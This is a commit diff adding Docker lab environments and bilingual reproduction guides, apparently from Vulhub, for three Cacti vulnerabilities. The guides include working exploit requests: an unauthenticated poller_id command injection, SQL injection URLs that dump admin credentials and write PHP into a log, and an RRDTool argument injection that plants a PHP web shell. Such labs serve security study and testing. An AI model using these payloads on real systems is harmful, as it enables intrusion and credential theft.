first commit

cacti/CVE-2022-46169/README.md

@@ -0,0 +1,56 @@
+# Cacti remote_agent.php Pre-Auth Command Injection (CVE-2022-46169)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Cacti is a robust and extensible operational monitoring and fault management framework for users around the world. A command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti prior from version 1.2.17 to 1.2.22, if a specific data source was selected for any monitored device.
+
+References:
+
+- <https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf>
+- <https://mp.weixin.qq.com/s/6crwl8ggMkiHdeTtTApv3A>
+
+## Vulnerability Environment
+
+Execute following command to start a Cacti server 1.2.22:
+
+```
+docker compose up -d
+```
+
+After the server is started, you will see the login page at `http://localhost:8080`.
+
+Then login as admin/admin, follow the instructions to initialize the application. Actually, just click the "next button" again and again before you see the success page.
+
+![](1.png)
+
+Before you can exploit this vulnerability, you have to add a new "Graph" because the command injection is occurred not in the default graph type:
+
+![](2.png)
+
+Select the graph type "Device - Uptime", and click the "Create" button:
+
+![](3.png)
+
+## Exploit
+
+After complete the above initialization, you will change your role to a attacker. Just send following request to Cacti server to trigger the command injection attack:
+
+```
+GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1
+X-Forwarded-For: 127.0.0.1
+Host: localhost.lan
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+```
+
+![](4.png)
+
+Although no command result in the response, you can find the `/tmp/success` has been touched successfully.
+
+![](5.png)

cacti/CVE-2022-46169/README.zh-cn.md

@@ -0,0 +1,54 @@
+# Cacti remote_agent.php 前台命令注入漏洞（CVE-2022-46169）
+
+Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞，攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。
+
+参考链接：
+
+- <https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf>
+- <https://mp.weixin.qq.com/s/6crwl8ggMkiHdeTtTApv3A>
+
+## 漏洞环境
+
+执行如下命令启动一个Cacti 1.2.22版本服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`会跳转到登录页面。使用admin/admin作为账号密码登录，并根据页面中的提示进行初始化。
+
+实际上初始化的过程就是不断点击“下一步”，直到安装成功：
+
+![](1.png)
+
+这个漏洞的利用需要Cacti应用中至少存在一个类似是`POLLER_ACTION_SCRIPT_PHP`的采集器。所以，我们在Cacti后台首页创建一个新的Graph：
+
+![](2.png)
+
+选择的Graph Type是“Device - Uptime”，点击创建：
+
+![](3.png)
+
+## 漏洞利用
+
+完成上述初始化后，我们切换到攻击者的角色。作为攻击者，发送如下数据包：
+
+```
+GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1
+X-Forwarded-For: 127.0.0.1
+Host: localhost.lan
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+```
+
+![](4.png)
+
+虽然响应包里没有回显，但是进入容器中即可发现`/tmp/success`已成功被创建：
+
+![](5.png)

cacti/CVE-2022-46169/docker-compose.yml

@@ -0,0 +1,19 @@
+version: '2'
+services:
+  web:
+    image: vulhub/cacti:1.2.22
+    ports:
+     - "8080:80"
+    depends_on:
+     - db
+    entrypoint:
+     - bash
+     - /entrypoint.sh
+    volumes:
+     - ./entrypoint.sh:/entrypoint.sh
+    command: apache2-foreground
+  db:
+   image: mysql:5.7
+   environment:
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=cacti

cacti/CVE-2022-46169/entrypoint.sh

@@ -0,0 +1,17 @@
+#!/bin/bash
+set -ex
+
+wait-for-it db:3306 -t 300 -- echo "database is connected"
+if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
+    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
+    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
+    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
+fi
+
+chown www-data:www-data -R /var/www/html
+# first arg is `-f` or `--some-option`
+if [ "${1#-}" != "$1" ]; then
+	set -- apache2-foreground "$@"
+fi
+
+exec "$@"

cacti/CVE-2023-39361/README.md

@@ -0,0 +1,62 @@
+# Cacti graph_view.php SQL Injection Leads to RCE (CVE-2023-39361/CVE-2024-31459)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality, providing network managers with an intuitive interface to network data.
+
+In Cacti versions 1.2.24 and earlier, a critical vulnerability exists in graph_view.php that allows guest users to perform SQL injection via the 'rfilter' parameter. When guest access is enabled, attackers can potentially cause significant damage, including remote code execution.
+
+References:
+
+- <https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg>
+- <https://github.com/Cacti/cacti/security/advisories/GHSA-cx8g-hvq8-p2rv>
+
+## Environment Setup
+
+Execute the following command to start a Cacti 1.2.24 server:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access the Cacti interface at `http://your-ip:8080`. The default credentials are admin/admin.
+
+Log in as admin and follow the initialization instructions. Simply click the "Next" button repeatedly until you see the success page.
+
+Before exploiting the vulnerability without authentication, you must enable guest access. Log in as admin, navigate to `Configuration -> Authentication`, and enable the guest user:
+
+![](1.png)
+
+## Vulnerability Reproduction
+
+The vulnerability exists in the `grow_right_pane_tree` function in `graph_view.php`. When the 'action' parameter is set to 'tree_content', the user input ('rfilter' parameter) is validated through the `html_validate_tree_vars` function, but this validation only ensures that the input is a valid regular expression and doesn't prevent SQL injection.
+
+The SQL injection occurs because the rfilter parameter is directly inserted into a SQL query with double quotes, allowing attackers to escape the query context and inject malicious SQL code.
+
+To exploit this vulnerability, send a request to the graph_view.php endpoint with the following parameters:
+
+```
+http://your-ip:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaaaa"%20OR%20""="(("))%20UNION%20SELECT%201,2,(select%20concat(id,0x23,username,0x23,password)%20from%20user_auth%20limit%201),4,5,6,(select%20user()),(select%20version()),9,10%23
+```
+
+The output reveals database information and admin account password:
+
+![](2.png)
+
+Since Cacti supports stacked queries, you can leverage this vulnerability along with [CVE-2024-31459](https://github.com/Cacti/cacti/security/advisories/GHSA-cx8g-hvq8-p2rv) to achieve local file inclusion.
+
+First, add a new plugin hook that points to the `log/cacti.log` file:
+
+```
+http://your-ip:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaa"%20OR%20""="(("));INSERT%20INTO%20plugin_hooks(name,hook,file,status)%20VALUES%20(".","login_before","../log/cacti.log",1);%23
+```
+
+Then, write PHP code to the `log/cacti.log` file using an error-based SQL injection:
+
+```
+http://your-ip:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaa"%20OR%20""="(("))%20UNION%20SELECT%201,2,3,4,5,6,updatexml(rand(),concat(0x7e,"<?php%20phpinfo();?>",0x7e),null),8,9,10%23
+```
+
+Now, the PHPINFO function will execute and display when accessing the login page, confirming successful remote code execution:
+
+![](3.png)

cacti/CVE-2023-39361/README.zh-cn.md

@@ -0,0 +1,58 @@
+# Cacti graph_view.php SQL注入导致远程代码执行漏洞（CVE-2023-39361/CVE-2024-31459）
+
+Cacti是一个全面的网络图形化解决方案，旨在利用RRDTool的数据存储和图形功能，为网络管理员提供直观的界面来监控和分析网络性能数据。
+
+在Cacti 1.2.24及更早版本中，graph_view.php文件存在一个严重的漏洞，当启用guest用户时，未经任何身份验证的攻击者通过'rfilter'参数即可执行SQL注入攻击，最终可能导致远程代码执行。
+
+参考链接：
+
+- <https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg>
+- <https://github.com/Cacti/cacti/security/advisories/GHSA-cx8g-hvq8-p2rv>
+
+## 环境搭建
+
+执行以下命令启动Cacti 1.2.24服务器：
+
+```
+docker compose up -d
+```
+
+服务器启动后，访问`http://your-ip:8080`进入Cacti界面。默认凭据为admin/admin。
+
+请以管理员身份登录并按照初始化说明进行操作。只需重复点击"下一步"按钮，直到看到成功页面。
+
+该漏洞如果需要未认证利用，必须启用guest用户。你可以以管理员身份登录，导航至`Configuration -> Authentication`页面，并启用guest用户：
+
+![](1.png)
+
+## 漏洞复现
+
+该漏洞位于`graph_view.php`文件中的`grow_right_pane_tree`函数内。当action参数设置为'tree_content'时，用户输入的rfilter参数由`html_validate_tree_vars`函数验证。然而，这种验证仅确保输入是有效的正则表达式，无法防止SQL注入。
+
+要利用此漏洞，向graph_view.php端点发送带有以下参数的请求：
+
+```
+http://your-ip:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaaaa"%20OR%20""="(("))%20UNION%20SELECT%201,2,(select%20concat(id,0x23,username,0x23,password)%20from%20user_auth%20limit%201),4,5,6,(select%20user()),(select%20version()),9,10%23
+```
+
+可见，数据库信息和管理员账号密码已被爆出：
+
+![](2.png)
+
+由于Cacti支持堆叠查询，你可以利用此漏洞结合[CVE-2024-31459](https://github.com/Cacti/cacti/security/advisories/GHSA-cx8g-hvq8-p2rv)实现本地文件包含。
+
+首先，添加一个指向`log/cacti.log`文件的新插件钩子：
+
+```
+http://your-ip:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaa"%20OR%20""="(("));INSERT%20INTO%20plugin_hooks(name,hook,file,status)%20VALUES%20(".","login_before","../log/cacti.log",1);%23
+```
+
+然后，利用报错SQL注入，将PHP代码写入`log/cacti.log`文件：
+
+```
+http://your-ip:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaa"%20OR%20""="(("))%20UNION%20SELECT%201,2,3,4,5,6,updatexml(rand(),concat(0x7e,"<?php%20phpinfo();?>",0x7e),null),8,9,10%23
+```
+
+此时，访问登录页面时，PHPINFO函数将执行并显示：
+
+![](3.png)

cacti/CVE-2023-39361/docker-compose.yml

@@ -0,0 +1,21 @@
+services:
+  web:
+    image: vulhub/cacti:1.2.24
+    ports:
+     - "8080:80"
+    depends_on:
+     - db
+    entrypoint:
+     - bash
+     - /entrypoint.sh
+    volumes:
+     - ./entrypoint.sh:/entrypoint.sh
+    command: apache2-foreground
+  db:
+   image: mysql:5.7
+   environment:
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=cacti
+   command: --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci
+   ports:
+    - "3306:3306"

cacti/CVE-2023-39361/entrypoint.sh

@@ -0,0 +1,16 @@
+#!/bin/bash
+set -ex
+
+wait-for-it db:3306 -t 300 -- echo "database is connected"
+if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
+    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
+    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
+    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
+fi
+
+# first arg is `-f` or `--some-option`
+if [ "${1#-}" != "$1" ]; then
+	set -- apache2-foreground "$@"
+fi
+
+exec "$@"

cacti/CVE-2025-24367/README.md

@@ -0,0 +1,50 @@
+# Cacti RRDTool Post-Auth Argument Injection Leads to RCE (CVE-2025-24367)
+
+[中文版本(Chinese version)](./README.zh-cn.md)
+
+Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality. Versions of Cacti up to 1.2.28 have a argument injection vulnerability that allows authenticated users to create arbitrary PHP files on the web server, potentially leading to remote code execution.
+
+The vulnerability occurs in the graph template functionality where user input for RRDTool command parameters, such as `--right-axis-label`, is not properly sanitized. While Cacti attempts to escape shell metacharacters using `cacti_escapeshellarg()`, it fails to handle newline characters. This allows attackers to break out of the intended command context and inject additional RRDTool commands, resulting in the ability to write malicious PHP files to the web root.
+
+References:
+
+- <https://github.com/Cacti/cacti/security/advisories/GHSA-fxrq-fr7h-9rqq>
+- <https://github.com/Cacti/cacti/commit/c7e4ee798d263a3209ae6e7ba182c7b65284d8f0>
+
+## Environment Setup
+
+Execute the following command to start Cacti 1.2.28:
+
+```
+docker compose up -d
+```
+
+After the service is started, you can access http://your-ip:8080 to visit Cacti. The default credentials are admin/admin.
+
+Log in as admin and follow the initialization instructions. Simply click the "Next" button repeatedly until you see the success page.
+
+## Vulnerability Reproduction
+
+First, you need to log in to Cacti. On the Cacti console, navigate to "Console → Templates → Graph" and find the "PING - Advanced Ping" template and edit it. Submit and capture the request, then modify the `right_axis_label` parameter to the following payload (please take care of the line breaks `%0a`):
+
+```
+XXX
+create my.rrd --step 300 DS:temp:GAUGE:600:-273:5000 RRA:AVERAGE:0.5:1:1200
+graph vulhub.php -s now -a CSV DEF:out=my.rrd:temp:AVERAGE LINE1:out:<?=phpinfo();?>
+```
+
+![](1.png)
+
+Then, navigate to "Console → Create → New Graphs" and create a new graph with the "PING - Advanced Ping" template:
+
+![](2.png)
+
+After that, navigate to "Graphs → Default Tree → Local Linux Machine" to trigger the payload execution.
+
+![](3.png)
+
+You will see an image with error message "Error: creating arguments", which means the payload has been executed.
+
+Our payload will create two files: a RRD file (my.rrd) and a PHP web shell (vulhub.php) in the Cacti web root:
+
+![](4.png)

cacti/CVE-2025-24367/README.zh-cn.md

@@ -0,0 +1,48 @@
+# Cacti RRDTool后台参数注入导致远程代码执行 (CVE-2025-24367)
+
+Cacti是一款利用RRDTool数据存储和图形化功能的完整网络图形化解决方案。在Cacti 1.2.28及以前版本中存在一个命令注入漏洞，该漏洞允许已认证用户在Web服务器上创建任意PHP文件，从而可能导致远程代码执行。
+
+此漏洞出现在图形模板功能中，用户输入的RRDTool命令参数，如`--right-axis-label`，未被正确过滤。虽然Cacti尝试使用`cacti_escapeshellarg()`函数转义shell元字符，但它未能处理换行符。这允许攻击者突破预期的命令上下文并注入其他RRDTool命令，最终能够向Web根目录写入恶意PHP文件。
+
+参考链接：
+
+- <https://github.com/Cacti/cacti/security/advisories/GHSA-fxrq-fr7h-9rqq>
+- <https://github.com/Cacti/cacti/commit/c7e4ee798d263a3209ae6e7ba182c7b65284d8f0>
+
+## 环境搭建
+
+执行如下命令启动Cacti 1.2.28：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问http://your-ip:8080即可看到Cacti的登录界面，默认用户名密码为admin/admin。
+
+你需要登录并按照初始化指引操作，只需点击"Next"按钮直到看到成功页面即可。
+
+## 漏洞复现
+
+首先，需要登录Cacti。在Cacti控制台，导航至"Console → Templates → Graph"，找到"PING - Advanced Ping"模板并编辑它。捕获这个编辑请求，然后修改`right_axis_label`参数为以下payload（请注意换行符`%0a`）：
+
+```
+XXX
+create my.rrd --step 300 DS:temp:GAUGE:600:-273:5000 RRA:AVERAGE:0.5:1:1200
+graph vulhub.php -s now -a CSV DEF:out=my.rrd:temp:AVERAGE LINE1:out:<?=phpinfo();?>
+```
+
+![](1.png)
+
+然后，来到"Console → Create → New Graphs"，使用"PING - Advanced Ping"模板创建一个新图表：
+
+![](2.png)
+
+之后，来到"Graphs → Default Tree → Local Linux Machine"来触发payload执行。
+
+![](3.png)
+
+你会看到一个带有"Error: creating arguments"错误消息的图像，这意味着payload已被执行。
+
+命令执行后，payload将在Cacti的Web根目录创建两个文件：一个RRD文件(my.rrd)和一个PHP网页shell(vulhub.php)：
+
+![](4.png)

cacti/CVE-2025-24367/docker-compose.yml

@@ -0,0 +1,21 @@
+services:
+  web:
+    image: vulhub/cacti:1.2.28
+    ports:
+     - "8080:80"
+    depends_on:
+     - db
+    entrypoint:
+     - bash
+     - /entrypoint.sh
+    volumes:
+     - ./entrypoint.sh:/entrypoint.sh
+    command: apache2-foreground
+  db:
+   image: mysql:5.7
+   environment:
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=cacti
+   command: --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci
+   ports:
+    - "3306:3306"

cacti/CVE-2025-24367/entrypoint.sh

@@ -0,0 +1,18 @@
+#!/bin/bash
+set -ex
+
+wait-for-it db:3306 -t 300 -- echo "database is connected"
+if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
+    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
+    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
+    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
+fi
+
+cron
+
+# first arg is `-f` or `--some-option`
+if [ "${1#-}" != "$1" ]; then
+	set -- apache2-foreground "$@"
+fi
+
+exec "$@"